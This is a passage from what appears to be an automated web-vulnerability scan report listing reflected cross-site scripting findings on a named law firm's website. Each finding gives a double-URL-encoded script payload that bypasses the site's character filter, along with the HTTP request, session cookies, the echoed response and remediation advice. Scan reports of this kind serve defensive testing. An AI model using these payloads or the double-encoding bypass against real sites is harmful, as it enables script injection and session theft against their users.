The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss4823f"><script>alert(1)</script>74755294a4f/awards/rss.xml" value="">
...[SNIP]...

2.119. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards3ddba"><script>alert(1)</script>b482c6d5ffe/rss.xml" value="">
...[SNIP]...

2.120. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards/rss.xml4862c"><script>alert(1)</script>626bbbadd84" value="">
...[SNIP]...

2.121. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss96c9a"><script>alert(1)</script>b17c06f0b56/events/rss.xml" value="">
...[SNIP]...

2.122. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events8d1d6"><script>alert(1)</script>3f934a0d192/rss.xml" value="">
...[SNIP]...

2.123. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events/rss.xml5ac25"><script>alert(1)</script>a7c854d93a" value="">
...[SNIP]...

2.124. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rsscefc3"><script>alert(1)</script>b60ad84eb9c/in_the_news/rss.xml" value="">
...[SNIP]...

2.125. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_newscc00e"><script>alert(1)</script>d760b3b5dd4/rss.xml" value="">
...[SNIP]...

2.126. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_news/rss.xmlb6f54"><script>alert(1)</script>2151516518f" value="">
...[SNIP]...

2.127. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss9abb7"><script>alert(1)</script>3d2f01cf3f9/news_releases/rss.xml" value="">
...[SNIP]...

2.128. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releasesdc1d0"><script>alert(1)</script>98c2f7af3b5/rss.xml" value="">
...[SNIP]...

2.129. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releases/rss.xmlee81a"><script>alert(1)</script>d27cf73a803" value="">
...[SNIP]...

2.130. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss32ca8"><script>alert(1)</script>73f8dfaacf9/practices/Advertising/rss.xml" value="">
...[SNIP]...

2.131. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices5de32"><script>alert(1)</script>bc55ccc6862/Advertising/rss.xml" value="">
...[SNIP]...

